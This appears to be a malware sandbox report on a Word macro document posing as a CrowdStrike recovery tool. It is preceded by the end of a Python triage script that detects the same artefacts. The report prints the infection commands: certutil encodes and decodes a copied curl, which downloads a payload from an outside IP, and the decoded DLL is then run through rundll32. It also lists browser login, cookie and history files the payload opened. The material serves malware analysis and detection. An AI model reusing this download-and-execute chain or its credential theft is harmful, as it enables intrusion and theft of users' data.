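            findings.append(f"temp-dll-load: rundll32.exe loaded {ev['target']}")
        elif http_on_nonstandard_port(ev):
            findings.append(f"odd-http-port: {ev['src_port']} -> {ev['dst_port']}")
    return findings


# Constructed telemetry mirroring the report's file and network artefacts,
# plus two benign events that must not fire.
SAMPLE_EVENTS = [
    {"type": "file_create", "image": r"C:\Windows\SysWOW64\xcopy.exe",
     "target": r"C:\Users\user\AppData\Local\Temp\curl.exe"},
    {"type": "file_create", "image": r"C:\Windows\SysWOW64\certutil.exe",
     "target": r"C:\Users\user\AppData\Local\Temp\mscorsvc.dll"},
    {"type": "file_create", "image": r"C:\Windows\System32\certutil.exe",
     "target": r"C:\Users\user\AppData\Local\Temp\root.crt"},  # benign
    {"type": "image_load", "image": r"C:\Windows\System32\rundll32.exe",
     "target": r"C:\Users\user\AppData\Local\Temp\mscorsvc.dll"},
    {"type": "image_load", "image": r"C:\Windows\System32\rundll32.exe",
     "target": r"C:\Windows\System32\shell32.dll"},  # benign
    {"type": "network", "protocol": "http", "src_port": 49717, "dst_port": 8099},
    {"type": "network", "protocol": "http", "src_port": 49724, "dst_port": 5000},
    {"type": "network", "protocol": "http", "src_port": 49800, "dst_port": 80},  # benign
]

if __name__ == "__main__":
    for line in triage(SAMPLE_EVENTS):
        print(line)
```

Each check alone is noisy (certutil legitimately writes certificates to Temp, and internal services do speak HTTP on 5000), so in production the three findings should be correlated on the same host within a short window rather than alerted on individually; the chain in this report would produce all three.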
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe | Code function: GetAdaptersInfo,_Smanip,
Source: C:\Users\user\AppData\Local\Temp\curl.exe | Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)
Source: C:\Windows\SysWOW64\certutil.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\mscorsvc.dll
Source: C:\Users\user\AppData\Local\Temp\curl.exe | API coverage: 5.4 %
Source: C:\Users\user\AppData\Local\Temp\curl.exe | API coverage: 9.1 %
Source: C:\Windows\System32\rundll32.exe TID: 6552 | Thread sleep count: 82 > 30
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\System32\rundll32.exe | Code function: 16_2_00007FFD92C0B230 _Bitmask_includes,operator&=,_Bitmask_includes,_Bitmask_includes,operator&=,_Bitmask_includes,GetFileAttributesExW,GetLastError,FindFirstFileW,GetLastError,FindClose,operator&=,std::_Fs_file::_Fs_file,Concurrency::details::_CriticalNonReentrantLock::_Scoped_lock::~_Scoped_lock,_Bitmask_includes,GetFileInformationByHandleEx,GetLastError,Concurrency::details::_CriticalNonReentrantLock::_Scoped_lock::~_Scoped_lock,operator&=,_Bitmask_includes,GetFileInformationByHandleEx,GetLastError,Concurrency::details::_CriticalNonReentrantLock::_Scoped_lock::~_Scoped_lock,operator&=,_Bitmask_includes,GetFileInformationByHandleEx,GetLastError,Concurrency::details::_CriticalNonReentrantLock::_Scoped_lock::~_Scoped_lock,operator&=,Concurrency::details::_CriticalNonReentrantLock::_Scoped_lock::~_Scoped_lock,Concurrency::details::_CriticalNonReentrantLock::_Scoped_lock::~_Scoped_lock,
Source: C:\Windows\System32\rundll32.exe | Code function: 16_2_00007FFD92C0B1C0 __std_fs_close_handle,FindFirstFileExW,GetLastError,
Source: C:\Windows\System32\rundll32.exe | Code function: 16_2_00007FFD92BF18C0 FindFirstFileW,new,delete,delete,std::_Lockit::_Lockit,std::_Lockit::~_Lockit,delete,delete,delete,FindNextFileW,FindClose,delete,delete,
Source: C:\Windows\System32\rundll32.exe | Code function: 16_2_00007FFD92CCDD10 type_info::_name_internal_method,FindFirstFileExW,Concurrency::details::_Scheduler::_Scheduler,std::_Container_base12::~_Container_base12,std::_Container_base12::~_Container_base12,std::_Container_base12::~_Container_base12,std::_Container_base12::~_Container_base12,std::_Container_base12::~_Container_base12,std::_Container_base12::~_Container_base12,FindNextFileW,std::_Container_base12::~_Container_base12,std::_Container_base12::~_Container_base12,
Source: C:\Windows\System32\rundll32.exe | Code function: 16_2_00007FFD92C95E80 GetSystemInfo,
Source: C:\Windows\System32\rundll32.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\Theme Colors\
Source: C:\Windows\System32\rundll32.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\
Source: C:\Windows\System32\rundll32.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Document Themes\1033\
Source: C:\Windows\System32\rundll32.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\
Source: C:\Windows\System32\rundll32.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\
Source: C:\Windows\System32\rundll32.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\
Source: document.xml | Binary or memory string: </w:t></w:r><w:r w:rsidRPr="0065064B"><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:b/><w:bCs/><w:color w:val="333333"/></w:rPr><w:t>Hyper-V Settings</w:t></w:r><w:r w:rsidRPr="0065064B"><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:color w:val="333333"/></w:rPr><w:t>
Source: document.xml | Binary or memory string: </w:t></w:r><w:r w:rsidRPr="0065064B"><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:b/><w:bCs/><w:color w:val="333333"/></w:rPr><w:t>Hyper-V settings</w:t></w:r><w:r w:rsidRPr="0065064B"><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:color w:val="333333"/></w:rPr><w:t>
Source: rundll32.exe, 00000010.00000002.5553191262.0000020A783B3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000024.00000003.4258778994.0000027F6C3D1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000024.00000002.4259308541.0000027F6C3D8000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: document.xml | Binary or memory string: </w:t></w:r><w:hyperlink r:id="rId9" w:tgtFrame="_self" w:history="1"><w:r w:rsidRPr="0065064B"><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:color w:val="146CAC"/><w:u w:val="single"/></w:rPr><w:t>https://go.microsoft.com/fwlink/?linkid=2280386</w:t></w:r></w:hyperlink><w:r w:rsidRPr="0065064B"><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:color w:val="333333"/></w:rPr><w:t>. In this document, we include detailed recovery steps for Windows client, servers, and OS's hosted on Hyper-V. The two repair options are as follows:</w:t></w:r></w:p><w:p w14:paraId="49DFB7AB" w14:textId="77777777" w:rsidR="0065064B" w:rsidRPr="0065064B" w:rsidRDefault="0065064B" w:rsidP="0065064B"><w:pPr><w:numPr><w:ilvl w:val="0"/><w:numId w:val="5"/></w:numPr><w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/><w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="259" w:lineRule="auto"/><w:jc w:val="both"/><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:color w:val="333333"/></w:rPr></w:pPr><w:r w:rsidRPr="0065064B"><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:b/><w:bCs/><w:color w:val="333333"/></w:rPr><w:t>Recover from WinPE</w:t></w:r><w:r w:rsidRPr="0065064B"><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:color w:val="333333"/></w:rPr><w:t>
Source: curl.exe, 0000000D.00000003.2188986234.00000000033F0000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000D.00000003.2189060757.00000000033F3000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllG
Source: document.xml | Binary or memory string: </w:t></w:r></w:p><w:p w14:paraId="70D69DE5" w14:textId="77777777" w:rsidR="0065064B" w:rsidRPr="0065064B" w:rsidRDefault="0065064B" w:rsidP="0065064B"><w:pPr><w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/><w:jc w:val="both"/><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:color w:val="333333"/></w:rPr></w:pPr><w:r w:rsidRPr="0065064B"><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:b/><w:bCs/><w:color w:val="333333"/></w:rPr><w:t>Steps to Recover Hyper-V virtual machines</w:t></w:r></w:p><w:p w14:paraId="74745A04" w14:textId="77777777" w:rsidR="0065064B" w:rsidRPr="0065064B" w:rsidRDefault="0065064B" w:rsidP="0065064B"><w:pPr><w:numPr><w:ilvl w:val="0"/><w:numId w:val="10"/></w:numPr><w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/><w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="259" w:lineRule="auto"/><w:jc w:val="both"/><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:color w:val="333333"/></w:rPr></w:pPr><w:r w:rsidRPr="0065064B"><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:color w:val="333333"/></w:rPr><w:t>On an impacted virtual machine, add a DVD Drive under
Source: rundll32.exe, 00000010.00000003.2451014222.0000020A783B4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.2540593407.0000020A783B4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.2416797193.0000020A783B3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.2550439735.0000020A783B4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.2500142406.0000020A783B3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.2430247545.0000020A783B4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.2257877794.0000020A783B3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.2479616705.0000020A783B3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.2461554328.0000020A783B3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.2429834267.0000020A783B3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.2510194846.0000020A783B4000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: document.xml | Binary or memory string: </w:t></w:r></w:p><w:p w14:paraId="5A9C771D" w14:textId="77777777" w:rsidR="0065064B" w:rsidRPr="0065064B" w:rsidRDefault="0065064B" w:rsidP="0065064B"><w:pPr><w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/><w:jc w:val="both"/><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:color w:val="333333"/></w:rPr></w:pPr><w:r w:rsidRPr="0065064B"><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:b/><w:bCs/><w:color w:val="333333"/></w:rPr><w:t>Using recovery media on Hyper-V virtual machines</w:t></w:r><w:r w:rsidRPr="0065064B"><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:color w:val="333333"/></w:rPr><w:t xml:space="preserve"> The recovery media can be used to remediate impacted Hyper-V virtual machines. To do so, select the option to generate an ISO when creating the recovery media using the steps above. For non-Hyper-V virtual machines, follow instructions provided by your hypervisor vendor to utilize the recovery media.</w:t></w:r></w:p><w:p w14:paraId="3F927671" w14:textId="77777777" w:rsidR="0065064B" w:rsidRPr="0065064B" w:rsidRDefault="0065064B" w:rsidP="0065064B"><w:pPr><w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/><w:jc w:val="both"/><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:color w:val="333333"/></w:rPr></w:pPr><w:r w:rsidRPr="0065064B"><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:color w:val="333333"/></w:rPr><w:t>
Source: rundll32.exe, 00000010.00000003.2238753292.0000020A783B3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.2238844395.0000020A783B4000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll00
Source: document.xml | Binary or memory string: s Hyper-V settings.</w:t></w:r></w:p><w:p w14:paraId="4A7B9EB4" w14:textId="77777777" w:rsidR="0065064B" w:rsidRPr="0065064B" w:rsidRDefault="0065064B" w:rsidP="0065064B"><w:pPr><w:numPr><w:ilvl w:val="0"/><w:numId w:val="14"/></w:numPr><w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/><w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="259" w:lineRule="auto"/><w:jc w:val="both"/><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:color w:val="333333"/></w:rPr></w:pPr><w:r w:rsidRPr="0065064B"><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:color w:val="333333"/></w:rPr><w:t>Reboot normally.</w:t></w:r></w:p><w:p w14:paraId="0384424D" w14:textId="77777777" w:rsidR="0065064B" w:rsidRPr="0065064B" w:rsidRDefault="0065064B" w:rsidP="0065064B"><w:pPr><w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/><w:jc w:val="both"/><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:color w:val="333333"/></w:rPr></w:pPr><w:r w:rsidRPr="0065064B"><w:rPr><w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/><w:color w:val="333333"/></w:rPr><w:lastRenderedPageBreak/><w:t>
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE | Process information queried: ProcessInformation
Source: C:\Users\user\AppData\Local\Temp\curl.exe | Code function: 13_2_008B155B IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Users\user\AppData\Local\Temp\curl.exe | Code function: 13_2_0087D33A GetModuleHandleA,GetProcAddress,_mbspbrk,LoadLibraryA,GetProcAddress,LoadLibraryExA,GetSystemDirectoryA,malloc,malloc,GetSystemDirectoryA,LoadLibraryA,free,free,
Source: C:\Windows\System32\taskkill.exe | Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\curl.exe | Code function: 13_2_008B0CB4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Users\user\AppData\Local\Temp\curl.exe | Code function: 13_2_008B16BE SetUnhandledExceptionFilter,
Source: C:\Windows\System32\rundll32.exe | Code function: 16_2_00007FFD92C91410 __crtCaptureCurrentContext,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Windows\System32\rundll32.exe | Code function: 16_2_00007FFD92C09FB0 SetUnhandledExceptionFilter,
Source: C:\Windows\System32\rundll32.exe | Code function: 16_2_00007FFD92C09D50 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Windows\System32\rundll32.exe | Code function: 16_2_00007FFD92C08970 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Users\user\AppData\Local\Temp\curl.exe | Code function: 33_2_00880CB4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Users\user\AppData\Local\Temp\curl.exe | Code function: 33_2_0088155B IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Users\user\AppData\Local\Temp\curl.exe | Code function: 33_2_008816BE SetUnhandledExceptionFilter,

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\System32\rundll32.exe | Network Connect: 172.104.160.126 5000
Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm | OLE indicator, VBA stomping: true
Source: ~WRC0000.tmp.26.dr | OLE indicator, VBA stomping: true
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\xcopy.exe xcopy C:\Windows\System32\curl.exe C:\Users\user\AppData\Local\Temp
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\certutil.exe certutil -f -encode C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.txt
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\certutil.exe certutil -f -decode C:\Users\user\AppData\Local\Temp\curl.txt C:\Users\user\AppData\Local\Temp\curl.exe
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.exe http://172.104.160.126:8099/payload2.txt -o C:\Users\user\AppData\Local\Temp\mscorsvc.txt
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\certutil.exe certutil -f -decode C:\Users\user\AppData\Local\Temp\mscorsvc.txt C:\Users\user\AppData\Local\Temp\mscorsvc.dll
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain
Source: C:\Windows\System32\rundll32.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c taskkill /F /IM chrome.exe
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM chrome.exe
Source: C:\Users\user\AppData\Local\Temp\curl.exe | Code function: 13_2_008B137A cpuid
Source: C:\Windows\System32\rundll32.exe | Code function: GetLocaleInfoW,GetACP,GetLocaleInfoW,
Source: C:\Windows\System32\rundll32.exe | Code function: __vcrt_getptd,__vcrt_getptd,GetLcidFromDefault,ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,
Source: C:\Windows\System32\rundll32.exe | Code function: __crt_fast_encode_pointer,EnumSystemLocalesW,
Source: C:\Windows\System32\rundll32.exe | Code function: __vcrt_getptd,EnumSystemLocalesW,
Source: C:\Windows\System32\rundll32.exe | Code function: GetLocaleInfoEx,FormatMessageA,
Source: C:\Windows\System32\rundll32.exe | Code function: GetLocaleInfoW,
Source: C:\Windows\SysWOW64\cmd.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\rundll32.exe | Queries volume information: C:\Windows\Temp\result.txt VolumeInformation
Source: C:\Windows\System32\rundll32.exe | Queries volume information: C:\Windows\Temp\SGlzdG9yeQ== VolumeInformation
Source: C:\Windows\System32\rundll32.exe | Queries volume information: C:\Windows\Temp\V2ViIERhdGE= VolumeInformation
Source: C:\Windows\System32\rundll32.exe | Queries volume information: C:\Windows\Temp\cGxhY2VzLnNxbGl0ZQ== VolumeInformation
Source: C:\Windows\System32\rundll32.exe | Queries volume information: C:\Windows\Temp\SVBLR0VMTlRRWS5kb2N4 VolumeInformation
Source: C:\Windows\System32\rundll32.exe | Queries volume information: C:\Windows\Temp\SVBLR0VMTlRRWS5wZGY= VolumeInformation
Source: C:\Windows\System32\rundll32.exe | Queries volume information: C:\Windows\Temp\TVhQWENWUERWTi5kb2N4 VolumeInformation
Source: C:\Windows\System32\rundll32.exe | Queries volume information: C:\Windows\Temp\TkVCRlFRWVdQUy5kb2N4 VolumeInformation
Source: C:\Windows\System32\rundll32.exe | Queries volume information: C:\Windows\Temp\TkVCRlFRWVdQUy54bHN4 VolumeInformation
Source: C:\Windows\System32\rundll32.exe | Queries volume information: C:\Windows\Temp\UElWRkFHRUFBVi5wZGY= VolumeInformation
Source: C:\Windows\System32\rundll32.exe | Queries volume information: C:\Windows\Temp\UUNGV1lTS01IQS5wZGY= VolumeInformation
Source: C:\Windows\System32\rundll32.exe | Queries volume information: C:\Windows\Temp\UU5DWUNERklKSi54bHN4 VolumeInformation
Source: C:\Windows\System32\rundll32.exe | Queries volume information: C:\Windows\Temp\U0ZQVVNBRklPTC5kb2N4 VolumeInformation
Source: C:\Windows\System32\rundll32.exe | Queries volume information: C:\Windows\Temp\U0ZQVVNBRklPTC54bHN4 VolumeInformation
Source: C:\Windows\System32\rundll32.exe | Queries volume information: C:\Windows\Temp\WlFJWE1WUUdBSC5wZGY= VolumeInformation
Source: C:\Windows\System32\rundll32.exe | Queries volume information: C:\Windows\Temp\WlFJWE1WUUdBSC54bHN4 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\curl.exe | Code function: 13_2_008B1775 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,
Source: C:\Windows\System32\rundll32.exe | Code function: 16_2_00007FFD92CC8F40 _invoke_watson_if_error,_invoke_watson_if_error,_invoke_watson_if_error,GetTimeZoneInformation,
Source: C:\Windows\SysWOW64\certutil.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information

Source: C:\Windows\System32\rundll32.exe | Code function: \Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\System32\rundll32.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\System32\rundll32.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\System32\rundll32.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\System32\rundll32.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite
Source: C:\Windows\System32\rundll32.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite
Source: C:\Windows\System32\rundll32.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\System32\rundll32.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\AppData\Local\Temp\curl.exe | Code function: 13_2_0089A8D8 calloc,calloc,___from_strstr_to_strchr,___from_strstr_to_strchr,inet_pton,strncpy,___from_strstr_to_strchr,strtoul,___from_strstr_to_strchr,strtoul,getsockname,WSAGetLastError,free,free,WSAGetLastError,htons,bind,WSAGetLastError,getsockname,WSAGetLastError,getsockname,WSAGetLastError,listen,WSAGetLastError,htons,free,free,
Source: C:\Users\user\AppData\Local\Temp\curl.exe | Code function: 13_2_008A699F socket,htonl,setsockopt,bind,getsockname,listen,socket,connect,ioctlsocket,accept,getsockname,getpeername,closesocket,closesocket,closesocket,closesocket,
Source: C:\Users\user\AppData\Local\Temp\curl.exe | Code function: 13_2_00898490 calloc,calloc,calloc,calloc,calloc,calloc,bind,WSAGetLastError,
Source: C:\Users\user\AppData\Local\Temp\curl.exe | Code function: 13_2_0087DEDF strncmp,strncmp,inet_pton,inet_pton,htons,htons,htons,bind,getsockname,WSAGetLastError,WSAGetLastError,
Source: C:\Windows\System32\rundll32.exe | Code function: 16_2_00007FFD92C496B0 _mbsset_s,_mbsset_s,getsockname,WSAGetLastError,WSAGetLastError,htons,bind,WSAGetLastError,getsockname,getsockname,listen,WSAGetLastError,htons,
Source: C:\Windows\System32\rundll32.exe | Code function: 16_2_00007FFD92C3DF49 bind,WSAGetLastError,
Source: C:\Windows\System32\rundll32.exe | Code function: 16_2_00007FFD92C37F90 socket,htonl,setsockopt,bind,getsockname,listen,socket,connect,accept,send,recv,WSAGetLastError,closesocket,closesocket,closesocket,closesocket,
Source: C:\Windows\System32\rundll32.exe | Code function: 16_2_00007FFD92C543E0 htons,_mbsset_s,htons,htons,bind,htons,bind,getsockname,WSAGetLastError,WSAGetLastError,
Source: C:\Windows\System32\rundll32.exe | Code function: 16_2_00007FFD92C3E1E0 bind,WSAGetLastError,
Source: C:\Users\user\AppData\Local\Temp\curl.exe | Code function: 33_2_0086A8D8 calloc,calloc,___from_strstr_to_strchr,___from_strstr_to_strchr,inet_pton,strncpy,___from_strstr_to_strchr,strtoul,___from_strstr_to_strchr,strtoul,getsockname,WSAGetLastError,free,free,WSAGetLastError,htons,bind,WSAGetLastError,getsockname,WSAGetLastError,getsockname,WSAGetLastError,listen,WSAGetLastError,htons,free,free,
Source: C:\Users\user\AppData\Local\Temp\curl.exe | Code function: 33_2_0087699F socket,htonl,setsockopt,bind,getsockname,listen,socket,connect,ioctlsocket,accept,getsockname,getpeername,closesocket,closesocket,closesocket,closesocket,
Source: C:\Users\user\AppData\Local\Temp\curl.exe | Code function: 33_2_00868490 calloc,calloc,calloc,calloc,calloc,calloc,bind,WSAGetLastError,
Source: C:\Users\user\AppData\Local\Temp\curl.exe | Code function: 33_2_0084DEDF strncmp,strncmp,inet_pton,inet_pton,htons,htons,htons,bind,getsockname,WSAGetLastError,WSAGetLastError,
Tactics and techniques (numbers in parentheses are the counts shown next to a technique in the matrix):
  • Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology; IP Addresses
  • Resource Development: Scripting (32); Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising; Compromise Infrastructure
  • Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application; Supply Chain Compromise
